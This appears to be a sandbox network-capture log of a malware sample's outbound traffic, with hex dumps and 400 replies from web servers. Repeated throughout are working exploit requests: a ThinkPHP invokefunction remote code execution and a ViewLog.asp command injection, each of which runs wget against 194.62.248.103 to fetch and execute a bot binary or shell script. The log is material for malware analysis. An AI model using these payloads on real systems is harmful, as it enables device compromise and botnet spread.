                                                        x-ws-request-id: 661bea19_PS-000-014A8242_14674-30643
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 31 34 3a 33 37 3a 31 33 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 34 41 38 32 34 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 62 69 6e
                                                        Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 14 Apr 2024 14:37:13 GMT<br><span class="F">IP: 81.181.54.60</span>Node information: PS-000-014A8242<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://194.62.248.103/bin
                                                        Apr 14, 2024 16:37:13.824807882 CEST459INData Raw: 55 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20
                                                        Data Ascii: UT requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript"
                                                        Apr 14, 2024 16:37:13.916748047 CEST459INData Raw: 55 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20
                                                        Data Ascii: UT requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript"
                                                        Apr 14, 2024 16:37:14.116820097 CEST459INData Raw: 55 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20
                                                        Data Ascii: UT requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        891192.168.2.2352824112.240.60.13580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:13.826776981 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:14.189279079 CEST457INData Raw: 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f
                                                        Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">f
                                                        Apr 14, 2024 16:37:14.189316034 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 2835
                                                        Connection: close
                                                        x-ws-request-id: 661bea1a_PS-000-014A8242_15352-2059
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 31 34 3a 33 37 3a 31 34 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 34 41 38 32 34 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 62 69 6e 73
                                                        Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 14 Apr 2024 14:37:14 GMT<br><span class="F">IP: 81.181.54.60</span>Node information: PS-000-014A8242<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://194.62.248.103/bins
                                                        Apr 14, 2024 16:37:14.189358950 CEST1289INData Raw: 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09
                                                        Data Ascii: /x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 661bea1a_PS-000-014A8242_15352-2059<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class
                                                        Apr 14, 2024 16:37:14.291098118 CEST457INData Raw: 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f
                                                        Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">f
                                                        Apr 14, 2024 16:37:14.476037025 CEST457INData Raw: 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f
                                                        Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">f


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        892192.168.2.233520895.112.41.1868080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:13.990689039 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:14.308306932 CEST536INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:13 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        893192.168.2.234412031.136.53.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:14.305248976 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:15.250993013 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:17.170927048 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.074017048 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:28.752947092 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:44.110857964 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:15.594793081 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        894192.168.2.234795495.101.56.8380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:14.484942913 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:14.781557083 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:14 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:14 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 35 61 33 33 62 38 26 23 34 36 3b 31 37 31 33 31 30 35 34 33 34 26 23 34 36 3b 31 37 30 32 36 62 35 62 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 62 36 35 61 33 33 62 38 26 23 34 36 3b 31 37 31 33 31 30 35 34 33 34 26 23 34 36 3b 31 37 30 32 36 62 35 62 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b65a33b8&#46;1713105434&#46;17026b5b<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;b65a33b8&#46;1713105434&#46;17026b5b</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        895192.168.2.234592094.122.115.1908080
